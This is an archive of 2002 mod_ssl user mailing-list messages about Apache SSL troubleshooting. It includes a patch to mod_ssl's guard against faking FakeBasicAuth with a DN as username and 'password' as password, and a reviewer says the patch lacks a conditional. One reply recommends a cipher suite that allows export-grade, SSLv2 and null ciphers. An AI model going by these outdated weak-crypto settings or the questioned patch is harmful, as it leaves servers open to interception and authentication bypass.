	from ewok.sytrix.com id PAA05826; Tue, 23 Apr 2002 15:11:32 +0200 (MET DST)
Received: from 226.balt.vasco.com (gateway.vasco.com [209.140.121.226])
	by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g3NCH8f10100
	for ; Tue, 23 Apr 2002 08:17:08 -0400
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [209.140.121.242]) with SMTP; 23 Apr 2002 13:11:30 UT
Date: Tue, 23 Apr 2002 09:11:54 -0400
MIME-Version: 1.0
Subject: Re: Problem loading mod_ssl.so in Apache 1.3.24
Message-ID: <3CC5255A.3997.1345F1A0@localhost>
In-reply-to: <12110.194.7.32.225.1019552390.squirrel@webmail.inno.com>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Hi there,
> 
> For some reason Apache refuses to load the mod_ssl module. It always
> complains it can't find the module although the required file is in
> the specifiedpath. Has anyone encountered this problem? Does anyone
> know a solution?
make sure that ssleay and libeay are both in the path.
> 
> I'm running Apache 1.3.24 on Windows NT service pack 5.
> 
> Thanks in advance,
> Stef
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 18:36:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA13588; Tue, 23 Apr 2002 18:35:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id SAA13584; Tue, 23 Apr 2002 18:34:39 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3NGW1J15184
	for ; Tue, 23 Apr 2002 12:32:02 -0400
Date: Tue, 23 Apr 2002 12:32:01 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Problem loading mod_ssl.so in Apache 1.3.24
In-Reply-To: <3CC5255A.3997.1345F1A0@localhost>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 23 Apr 2002, Aryeh Katz wrote:

> make sure that ssleay and libeay are both in the path.

Um, or libssl and libcrypto from openssl (in the library path, that is).
ssleay's getting to be pretty old these days.  :)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 18:40:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA13745; Tue, 23 Apr 2002 18:39:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.allcash.de id SAA13731; Tue, 23 Apr 2002 18:38:32 +0200 (MET DST)
Received: from srvall18.allcash.de (srvall18.intern.allcash.de [192.168.85.19])
	by mail.allcash.de (8.11.0/8.11.0/SuSE Linux 8.11.0-0.4) with ESMTP id g3NGcNa21452;
	Tue, 23 Apr 2002 18:38:23 +0200
X-Authentication-Warning: mail.allcash.de: Host srvall18.intern.allcash.de [192.168.85.19] claimed to be srvall18.allcash.de
Received: by srvall18.intern.allcash.de with Internet Mail Service (5.5.2655.55)
	id ; Tue, 23 Apr 2002 18:38:23 +0200
Message-ID: <770FEC75F301D611B59B00902777E56A11466D@srvall18.intern.allcash.de>
From: "Nisbach, Thomas" 
To: "'David McInnis'" 
Cc: "'modssl-users@modssl.org'" 
Subject: Re: SSL-Problem with Mac MSIE
Date: Tue, 23 Apr 2002 18:38:22 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA13742
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nisbach, Thomas" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi David,

there was a discussion in the mod_ssl-group a few weeks
ago. Some solutions/workarounds were discussed.
Robert Allerstorfer ment he found "THE" solution. Last
week one of our clients tried to access our "fixed"
SSL-server via Mac MSIE 5.13 and still had a problem.
The only thing working thing working at our site was
disabling SSLv3.
Additionally here's an extract of one of my contributions
to the mod_ssl-discussion:
>>>>
Hi,

i found one (unsatisfying) solution:
I disabled SSLv3 by setting

SSLProtocol -SSLv3

If i do this MSIE on Mac runs but i worry about
other browser that would not run anymore :-(

Try also what's posted in
http://www.mail-archive.com/modssl-users@modssl.org/msg13577.html
<<<
-----Ursprüngliche Nachricht-----
Von: David McInnis [mailto:david@dataovation.com]
Gesendet: Dienstag, 23. April 2002 06:01
An: nisbach@allcash.de
Betreff: SSL-Problem with Mac MSIE


Did you ever come up with a fix for this?  I am having the same problem.

Thanks,

David McInnis
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 18:46:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA14036; Tue, 23 Apr 2002 18:45:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ewok.sytrix.com id SAA13990; Tue, 23 Apr 2002 18:44:10 +0200 (MET DST)
Received: from 226.balt.vasco.com
	by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g3NFnjv10325
	for ; Tue, 23 Apr 2002 11:49:45 -0400
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [209.140.121.242]) with SMTP; 23 Apr 2002 16:44:08 UT
Date: Tue, 23 Apr 2002 12:46:31 -0400
MIME-Version: 1.0
Subject: Re: Problem loading mod_ssl.so in Apache 1.3.24
Message-ID: <3CC557A7.31618.140A6F7C@localhost>
References: <3CC5255A.3997.1345F1A0@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> On Tue, 23 Apr 2002, Aryeh Katz wrote:
> 
> > make sure that ssleay and libeay are both in the path.
> 
> Um, or libssl and libcrypto from openssl (in the library path, that
> is). ssleay's getting to be pretty old these days.  :)
poster specified a win32 environment, ssleay32.dll is one of the two openssl libs on win32.
Aryeh

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 19:19:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15541; Tue, 23 Apr 2002 19:18:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id TAA15522; Tue, 23 Apr 2002 19:17:52 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3NHFCc28525
	for ; Tue, 23 Apr 2002 13:15:12 -0400
Date: Tue, 23 Apr 2002 13:15:12 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Problem loading mod_ssl.so in Apache 1.3.24
In-Reply-To: <3CC557A7.31618.140A6F7C@localhost>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 23 Apr 2002, Aryeh Katz wrote:

> poster specified a win32 environment, ssleay32.dll is one of the two
> openssl libs on win32.

Ah missed that.  Sorry.  :)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 20:04:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA16634; Tue, 23 Apr 2002 20:03:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id UAA16620; Tue, 23 Apr 2002 20:02:43 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g3NI2Vv8062774
	for modssl-users@modssl.org; Tue, 23 Apr 2002 20:02:31 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0Ue3D; Tue Apr 23 20:02:28 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id TAA01191
	for ; Tue, 23 Apr 2002 19:59:51 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id UAA92360
	for modssl-users@modssl.org; Tue, 23 Apr 2002 20:01:37 +0200 (METDST)
Date: Tue, 23 Apr 2002 20:01:37 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Subject: Re: SSL-Problem with Mac MSIE
Message-ID: <20020423200137.A7073118@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org
References: <770FEC75F301D611B59B00902777E56A11466D@srvall18.intern.allcash.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <770FEC75F301D611B59B00902777E56A11466D@srvall18.intern.allcash.de>; from nisbach@allcash.de on Tue, Apr 23, 2002 at 06:38:22PM +0200
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Tue, Apr 23, 2002 at 06:38:22PM +0200, Nisbach, Thomas wrote:
> i found one (unsatisfying) solution:
> I disabled SSLv3 by setting
> 
> SSLProtocol -SSLv3
> 
> If i do this MSIE on Mac runs but i worry about
> other browser that would not run anymore :-(

Btw, as for my understanding this does not disable TLSv1: Does
IE's TLS1-support work any better than its SSL3 implementation?

And what also bothers me: Why do these problems only seem to
affect OpenSSL based webservers, and not for example iPlanet? Do
these non-affected servers contain other/better workarounds? Or do
they only support SSL2?

Is it really such a serious drawback to disable SSL3? Most current
browsers (e.g. links, Mozilla, Opera) seem to support and default
to TLS1, anyway.


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 24 01:39:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA29889; Wed, 24 Apr 2002 01:38:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id BAA29851; Wed, 24 Apr 2002 01:37:10 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GV1O9W00.696 for ; Wed, 24 Apr 2002
          00:37:08 +0100 
Message-ID: <3CC5F024.90406@itaction.co.uk>
Date: Wed, 24 Apr 2002 00:37:08 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL-Problem with Mac MSIE
References: <770FEC75F301D611B59B00902777E56A11466D@srvall18.intern.allcash.de> <20020423200137.A7073118@ohm.arago.de>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

No I wouldnt want to disable SSL3 either...

One case I know of like this is to do with advertising EXPORT56 ciphers 
on the server side... some variants of IE barf if they're talking to a 
site with a so called 128 bit certificate (an SGC cert).

I have used this when a site has an uber-cert for marketing reasons, and 
the crypto requirement is not high:

SSLCipherSuite 
!EXPORT56:ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

the broken clients end up using SSL3 with 40bit keylength, good clients 
talk SSL3/128bit or TLS, it still gives the option for SSL2 and allows 
null encryption too.


Thomas Binder wrote:

>Hi!
>
>On Tue, Apr 23, 2002 at 06:38:22PM +0200, Nisbach, Thomas wrote:
>  
>
>>i found one (unsatisfying) solution:
>>I disabled SSLv3 by setting
>>
>>SSLProtocol -SSLv3
>>
>>If i do this MSIE on Mac runs but i worry about
>>other browser that would not run anymore :-(
>>    
>>
>
>Btw, as for my understanding this does not disable TLSv1: Does
>IE's TLS1-support work any better than its SSL3 implementation?
>
>And what also bothers me: Why do these problems only seem to
>affect OpenSSL based webservers, and not for example iPlanet? Do
>these non-affected servers contain other/better workarounds? Or do
>they only support SSL2?
>
>Is it really such a serious drawback to disable SSL3? Most current
>browsers (e.g. links, Mozilla, Opera) seem to support and default
>to TLS1, anyway.
>
>
>Ciao
>
>Thomas
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 24 21:07:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA22291; Wed, 24 Apr 2002 21:06:59 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA22195; Wed, 24 Apr 2002 21:04:20 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 92E244CE76A; Wed, 24 Apr 2002 21:04:17 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3OIg0k65730; Wed, 24 Apr 2002 20:42:00 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id QAA08595; Wed, 24 Apr 2002 16:43:07 +0200 (MET DST)
Date: Wed, 24 Apr 2002 16:43:07 +0200 (MET DST)
Message-Id: <200204241443.QAA08595@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: RE: [BugDB] Client Authentication BUG with FakeBasicAuth (PR#695)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This submission is missing a conditional expression before line 1161.

What test is performed prior to executing the DN/password check in the
new code?

Rick Barry

Compaq Computer Corporation   Compaq Secure Web Server Project Team
110 Spit Brook Road           OpenVMS System Software Group
Nashua, NH  03062             Business Critical Server Group
(603) 884-0634

-----Original Message-----
From: modssl-bugdb@modssl.org [mailto:modssl-bugdb@modssl.org]
Sent: Wednesday, April 17, 2002 6:54 AM
To: modssl-users@modssl.org
Cc: modssl-bugdb@modssl.org
Subject: [BugDB] Client Authentication BUG with FakeBasicAuth (PR#695)


Full_Name: Sergio Rabellino
Version: 2.8.8
OS: Solaris 7
Submission from: (NULL) (130.192.239.73)


The "if" in ssl_engine_kernel.c at line 1130 to check against DN/password
authorization
directly form a client, break also the internal redirect done by apache under
some conditions, as the directory indexing ...

So if you use client auth, with fake basic auth and require an index, you get a
301 followed by a 403 (Forbidden)...

Below i've attached a diff patch to correct this behaviour; i've tested it on my
hosts
and all things should be fine now.

Thanks to Nick Miles for pinpointing me to the solution.

Bye.

---snip
1130,1147d1129
<      * Make sure the user is not able to fake the client certificate
<      * based authentication by just entering an X.509 Subject DN
<      * ("/XX=YYY/XX=YYY/..") as the username and "password" as the
<      * password.
<      */
<     if ((cpAL = ap_table_get(r->headers_in, "Authorization")) != NULL) {
<         if (strcEQ(ap_getword(r->pool, &cpAL, ' '), "Basic")) {
<             while (*cpAL == ' ' || *cpAL == '\t')
<                 cpAL++;
<             cpAL = ap_pbase64decode(r->pool, cpAL);
<             cpUN = ap_getword_nulls(r->pool, &cpAL, ':');
<             cpPW = cpAL;
<             if (cpUN[0] == '/' && strEQ(cpPW, "password"))
<                 return FORBIDDEN;
<         }
<     }
< 
<     /*
1158a1141,1161
>       {
>       /*
>       * Make sure the user is not able to fake the client certificate
>       * based authentication by just entering an X.509 Subject DN
>       * ("/XX=YYY/XX=YYY/..") as the username and "password" as the
>       * password.
>       */
>       if ((cpAL = ap_table_get(r->headers_in, "Authorization")) != NULL) {
>               if (strcEQ(ap_getword(r->pool, &cpAL, ' '), "Basic")) {
>               while (*cpAL == ' ' || *cpAL == '\t')
>                       cpAL++;
>               cpAL = ap_pbase64decode(r->pool, cpAL);
>               cpUN = ap_getword_nulls(r->pool, &cpAL, ':');
>               cpPW = cpAL;
>               if (cpUN[0] == '/' && strEQ(cpPW, "password"))
>               {
>                       ssl_log(r->server, SSL_LOG_INFO, "WARNING: Old mod_ssl
breakthrough solicited (FakeBasicAuth by DN) !");
>                       return FORBIDDEN;
>               }
>               }
>       }
1159a1163
>       }
1160a1165
> 
--snip
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 03:43:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA10485; Thu, 25 Apr 2002 03:42:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vulcan.bascom.com id DAA10452; Thu, 25 Apr 2002 03:41:27 +0200 (MET DST)
Received: (from nobody@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id g3P1fP424599
	for modssl-users@modssl.org; Wed, 24 Apr 2002 21:41:25 -0400
X-Authentication-Warning: vulcan.bascom.com: nobody set sender to dcomo@bascom.com using -f
Received: from 24.184.132.139 ( [24.184.132.139])
	as user dcomo@vulcan.bascom.com by mailserver.bascom.com with HTTP;
	Wed, 24 Apr 2002 21:41:24 -0400
Message-ID: <1019698884.3cc75ec5019b0@mailserver.bascom.com>
Date: Wed, 24 Apr 2002 21:41:25 -0400
From: "Drew J. Como" 
To: modssl-users@modssl.org
Subject: Dummy SSL Certs and W32/Internet Explorer
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.0
X-Originating-IP: 24.184.132.139
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

All,

I have just installed mod_ssl-2.8.7 with Apache 1.3.23
on my SuSE system.  Everything built ok, but the problem
that I am having is when I am using 'dummy' or fake certificates.

My Netscape/Mozilla users can easily accept and save the dummy certificates
(the first time to the site) and then on each visit to the SSL-enabled site, 
it doesn't prompt them to accept the cert since it is saved.

However, (there's always one), Internet Explorer accepts the certificate
and you can even 'import' it into your program, (It even shows in the
list), but if you close the browser and then go back to the SSL-enabled site,
it asks you to save the cert once again, just like it did the first time.

Is this a browser bug, an unset-setting, or just MS thinking for us
again?

Any help would be greatly appreciated!!

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    Bascom Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal, 
           winning is guaranteed." 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 09:21:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA25585; Thu, 25 Apr 2002 09:20:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA25566; Thu, 25 Apr 2002 09:20:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 083A04CE76B; Thu, 25 Apr 2002 09:20:05 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3P7Ght76801; Thu, 25 Apr 2002 09:16:43 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.scottwilson.com.hk id DAA10269; Thu, 25 Apr 2002 03:35:08 +0200 (MET DST)
Message-ID: <3321CF48237CD511909000B0D0F09DA35F2329@EXCHANGE>
From: Conrad Ng 
To: modssl-users@modssl.org
Subject: Problems with mod_jk.so
Date: Thu, 25 Apr 2002 09:31:33 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Conrad Ng 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear Sir

I have a problem regarding the installation of the jakarta-tomcat 3.2.3 with
Apache 1.3.22 under IBM AIX 4.3.3 unix system.
 
We have followed the instruction from the Jakarta website to generate the
mod_jk.so file. However, when we tried to execute the build-unix.sh file,
the system has prompt out an error "Command failed with rc=255" when
executing apxs scripts.

Here is the list of questions that I want to ask:

1. What is the meaning of rc=255?
2. What mistake I have made which cause me not able to generate the
mod_jk.so file?
3. Is it possible to download this binary file from the web?

Many thanks!!

Conrad Ng



______________________________________________________

This e-mail and any attachments to it are intended only for the party to
whom they are addressed. They may contain privileged and/or confidential
information. If you have received this transmission in error please notify
the sender immediately and delete any digital copies and destroy any paper
copies. Thank you.

Scott Wilson accepts no contractual liabilities or commitments arising from
this e-mail unless subsequently confirmed by fax or letter or as an e-mail
attachment giving company name, address, registration number and authorized
signatory.
______________________________________________________

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 09:30:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA26399; Thu, 25 Apr 2002 09:29:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhost.cowan.edu.au id JAA26359; Thu, 25 Apr 2002 09:28:20 +0200 (MET DST)
Received: from chmail.ch.ecu.edu.au (chmail.ch.ecu.edu.au [139.230.140.10])
	by mailhost.cowan.edu.au (8.11.3/8.11.3) with ESMTP id g3P7SEP09126
	for ; Thu, 25 Apr 2002 15:28:14 +0800 (WST)
Received: from Churchlands Domain-MTA by chmail.ch.ecu.edu.au
	with Novell_GroupWise; Thu, 25 Apr 2002 15:28:11 +0800
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Thu, 25 Apr 2002 15:28:01 +0800
From: "Chris Cooper" 
To: 
Subject: Re: Problems with mod_jk.so
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Cooper" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

This is an automatically generated response:

A message recently from your e-mail address matched the signature of a
known virus and has therefore been placed in a quaranteen area.

If your message was not generated by the virus, please let me know and
I'll retrieve the message from the quarantine area.

Please note:
Many viruses have the ability to access your e-mail address book and
settings then send copies of themselves without your knowledge. If you
did not e-mail me and yet received this reply please scan your PC!

Regards,
Chr!s

- - - - - -
Chris Cooper                                  c.cooper@ecu.edu.au
Student Service Centre               webmaster@ecu.edu.au
Edith Cowan University               http://www.ecu.edu.au/
Pearson Street                              Tel:  +61 8 9273 8652
Churchlands                                   Fax: +61 8 9273 8000
- - - - - -
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 15:24:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA16886; Thu, 25 Apr 2002 15:23:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vasco-exch.vasco.com id PAA16860; Thu, 25 Apr 2002 15:22:32 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by vasco-exch.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 25 Apr 2002 15:19:40 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 25 Apr 2002 13:22:30 UT
Date: Thu, 25 Apr 2002 09:24:57 -0400
MIME-Version: 1.0
Subject: Re: Dummy SSL Certs and W32/Internet Explorer
Message-ID: <3CC7CB69.2743.8D45997@localhost>
In-reply-to: <1019698884.3cc75ec5019b0@mailserver.bascom.com>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 25 Apr 2002 13:19:41.0023 (UTC) FILETIME=[DB6716F0:01C1EC5B]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> All,
> 
> I have just installed mod_ssl-2.8.7 with Apache 1.3.23
> on my SuSE system.  Everything built ok, but the problem
> that I am having is when I am using 'dummy' or fake certificates.
> 
> My Netscape/Mozilla users can easily accept and save the dummy
> certificates (the first time to the site) and then on each visit to
> the SSL-enabled site, it doesn't prompt them to accept the cert since
> it is saved.
> 
> However, (there's always one), Internet Explorer accepts the
> certificate and you can even 'import' it into your program, (It even
> shows in the list), but if you close the browser and then go back to
> the SSL-enabled site, it asks you to save the cert once again, just
> like it did the first time.
> 
> Is this a browser bug, an unset-setting, or just MS thinking for us
> again?
Try rebooting. You should see the certificate in the correct store once you do.
Aryeh
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 15:46:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA17959; Thu, 25 Apr 2002 15:45:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vulcan.bascom.com id PAA17934; Thu, 25 Apr 2002 15:44:59 +0200 (MET DST)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id g3PDirv20654
	for modssl-users@modssl.org; Thu, 25 Apr 2002 09:44:53 -0400
Received: from dcomont (sandstorm-red.bascom.com [206.112.62.241])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id g3PDiqf20604
	for ; Thu, 25 Apr 2002 09:44:52 -0400
From: "Drew J. Como" 
To: 
Subject: RE: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 09:47:01 -0400
Message-ID: <001101c1ec5f$adeddde0$13013c0a@dcomo>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
